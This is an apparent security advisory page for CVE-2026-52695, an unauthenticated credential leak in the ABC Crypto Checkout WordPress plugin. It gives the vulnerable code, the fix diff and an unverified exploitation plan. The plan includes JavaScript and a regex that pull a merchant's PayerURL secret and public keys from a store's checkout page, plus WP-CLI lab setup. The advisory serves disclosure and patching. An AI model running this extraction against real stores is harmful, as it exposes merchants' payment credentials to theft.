CVE-2026-52695

ABC Crypto Checkout <= 1.8.2 - Unauthenticated Information Exposure

mediumExposure of Sensitive Information to an Unauthorized Actor
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.8.3
Patched in
9d
Time to patch

Description

The ABC Crypto Checkout plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.8.2
PublishedJune 10, 2026
Last updatedJune 18, 2026

What Changed in the Fix

Changes introduced in v1.8.3

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

This exploitation research plan targets **CVE-2026-52695**, a sensitive information exposure vulnerability in the **ABC Crypto Checkout** plugin (version <= 1.8.2). ### 1. Vulnerability Summary The vulnerability exists within the implementation of the WooCommerce Blocks integration for the Payerurl…

Show full research plan

This exploitation research plan targets CVE-2026-52695, a sensitive information exposure vulnerability in the ABC Crypto Checkout plugin (version <= 1.8.2).

1. Vulnerability Summary

The vulnerability exists within the implementation of the WooCommerce Blocks integration for the Payerurl gateway. Specifically, the class WC_Gateway_Payerurl_Blocks_Support (in class-payerurl-gateway-blocks.php) improperly handles configuration data. By returning the entire settings array to the WooCommerce Blocks registry without filtering out sensitive fields, the plugin exposes the merchant's Secret Key and Public Key to any user—including unauthenticated visitors—who accesses the checkout page.

2. Attack Vector Analysis

  • Endpoint: The public WooCommerce Checkout page (rendered using the Checkout Block).
  • Target Data: The payerurl_secret_key and payerurl_public_key.
  • Authentication: None (Unauthenticated).
  • Preconditions:
    1. The Payerurl gateway must be enabled.
    2. The store must be using the modern WooCommerce Checkout Block (standard in WooCommerce 8.0+).
    3. API credentials must be saved in the gateway settings.

3. Code Flow

  1. Plugin Initialization: Payerurl::woocommerce_payerurl_block_support() (in payerurl.php) registers the payment method block support by instantiating WC_Gateway_Payerurl_Blocks_Support.
  2. Data Preparation: The WC_Gateway_Payerurl_Blocks_Support::initialize() method retrieves all gateway settings:
    $this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array());
  3. Data Exposure: The get_payment_method_data() method (required by the AbstractPaymentMethodType interface) returns the unfiltered $this->settings array.
  4. Frontend Localization: WooCommerce Blocks calls get_payment_method_data() and localizes the returned array into the frontend's wcSettings global object (specifically for the checkout block) so that the JavaScript-based payment component can access its configuration.
  5. Information Leak: The data is rendered into the HTML of the checkout page as a JSON object within a <script> tag.

4. Nonce Acquisition Strategy

This vulnerability does not require a WordPress nonce. The exposure occurs during the standard rendering of the public Checkout page. No AJAX requests or authenticated endpoints are needed to trigger the leak; it is a passive information disclosure.

5. Exploitation Strategy

The exploitation involves navigating to the checkout page and extracting the JSON-encoded configuration data.

Step-by-Step Plan:

  1. Identify Checkout URL: Locate the store's checkout page (usually /checkout/).
  2. Navigate and Inspect: Use the browser to load the checkout page.
  3. Data Extraction: Use the browser_eval tool to retrieve the sensitive settings from the wcSettings global object.

HTTP Request (Verification):

GET /checkout/ HTTP/1.1
Host: [target_host]
User-Agent: Mozilla/5.0
Accept: text/html

Browser Evaluation (Extraction):
Execute the following JavaScript to extract the keys from the WooCommerce settings object:

// Access the payment method data from the global wcSettings object
const payerurlSettings = window.wcSettings?.paymentMethodData?.['wc_payerurl_gateway'];

if (payerurlSettings) {
    console.log("Public Key:", payerurlSettings.payerurl_public_key);
    console.log("Secret Key:", payerurlSettings.payerurl_secret_key);
    return payerurlSettings;
} else {
    return "Gateway settings not found in wcSettings.";
}

6. Test Data Setup

To reproduce this in a test environment:

  1. Install Requirements: Install WordPress, WooCommerce, and the ABC Crypto Checkout plugin (v1.8.2).
  2. Configure Gateway: Use WP-CLI to simulate a merchant configuration:
    wp option update woocommerce_wc_payerurl_gateway_settings '{
        "enabled": "yes",
        "payerurl_public_key": "PUB-TEST-123456",
        "payerurl_secret_key": "SEC-TEST-654321",
        "title": "Crypto Payment"
    }' --format=json
    
  3. Ensure Checkout Block: Create a checkout page using the Block editor:
    wp post create --post_type=page --post_title="Checkout" --post_status=publish --post_content='<!-- wp:woocommerce/checkout /-->'
    
  4. Set as WooCommerce Checkout:
    wp option update woocommerce_checkout_page_id $(wp post list --name="checkout" --post_type=page --field=ID)
    

7. Expected Results

Upon navigating to the checkout page, the browser_eval tool should return a JSON object containing the configured keys:

{
  "enabled": "yes",
  "payerurl_public_key": "PUB-TEST-123456",
  "payerurl_secret_key": "SEC-TEST-654321",
  "title": "Crypto Payment"
}

The presence of payerurl_secret_key in the frontend response confirms the information exposure.

8. Verification Steps

After the HTTP/browser-based extraction, verify that the extracted data matches the database state using WP-CLI:

wp option get woocommerce_wc_payerurl_gateway_settings --format=json

Compare the payerurl_secret_key field from the database to the value captured via the browser. If they match, the information disclosure is verified.

9. Alternative Approaches

If window.wcSettings is not directly accessible or formatted differently, search the page source for the Payerurl ID:

  1. Source Search: Perform a string search in the HTML source for payerurl_secret_key.
    # Conceptual search via browser_eval
    browser_eval("document.documentElement.innerHTML.match(/payerurl_secret_key\":\"(.*?)\"/)[1]")
    
  2. Legacy Checkout Check: If the store uses the Shortcode-based checkout ([woocommerce_checkout]) instead of the Block-based checkout, the vulnerability may not be exploitable via the AbstractPaymentMethodType path, as that class specifically services the Blocks API. In that case, check for wp_localize_script calls in class-payerurl-gateway.php that might also leak settings to the legacy frontend.
Research Findings
Static analysis — not yet PoC-verified

Summary

The ABC Crypto Checkout plugin for WordPress exposes sensitive API credentials, including the merchant's Secret Key and Public Key, to unauthenticated users. This occurs because the WooCommerce Blocks integration class returns the unfiltered settings array to the frontend, which is then rendered into the global window.wcSettings JavaScript object on the public checkout page.

Vulnerable Code

/* class-payerurl-gateway-blocks.php:15 */
        public function initialize()
        {
            $this->settings = get_option('woocommerce_wc_payerurl_gateway_settings', array());
            $this->gateway  = new WC_Payerurl();
        }

---

/* class-payerurl-gateway-blocks.php:49 */
        public function get_payment_method_data()
        {
            return $this->settings;
        }

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/payerurl-crypto-currency-payment-gateway-for-woocommerce/1.8.2/class-payerurl-gateway-blocks.php	2026-05-15 05:58:06.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/payerurl-crypto-currency-payment-gateway-for-woocommerce/1.8.3/class-payerurl-gateway-blocks.php	2026-06-03 09:27:40.000000000 +0000
@@ -49,9 +48,28 @@
             return array('wc-payerurl-payments-blocks');
         }
 
+        /**
+         * FIX (CVE / Patchstack report):
+         * Previously returned $this->settings which exposed payerurl_secret_key
+         * and payerurl_public_key to the browser via window.wc.wcSettings.
+         * Now returns only the display fields the frontend checkout UI needs.
+         * Credentials never leave the server.
+         */
         public function get_payment_method_data()
         {
-            return $this->settings;
+            return [
+                'title'       => $this->get_setting('title', 'Crypto Payment via PayerURL'),
+                'description' => $this->get_setting('description', 'Pay securely with cryptocurrency.'),
+                'supports'    => array_filter($this->gateway->supports, [$this->gateway, 'supports']),
+            ];
+        }
+
+        /**
+         * Helper to safely read a single setting without exposing the full array.
+         */
+        private function get_setting($key, $default = '')
+        {
+            return isset($this->settings[$key]) ? $this->settings[$key] : $default;
         }
     }

Exploit Outline

The exploit is a passive information disclosure requiring no authentication or nonces. An attacker identifies a WooCommerce store using the modern Checkout Block with the PayerURL gateway enabled. By navigating to the checkout page, the attacker can access the browser's developer console and inspect the 'window.wcSettings' global object. The sensitive 'payerurl_secret_key' and 'payerurl_public_key' are stored within the 'paymentMethodData.wc_payerurl_gateway' property of this object, as the plugin fails to filter them out before localizing the payment method data for the JavaScript frontend.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.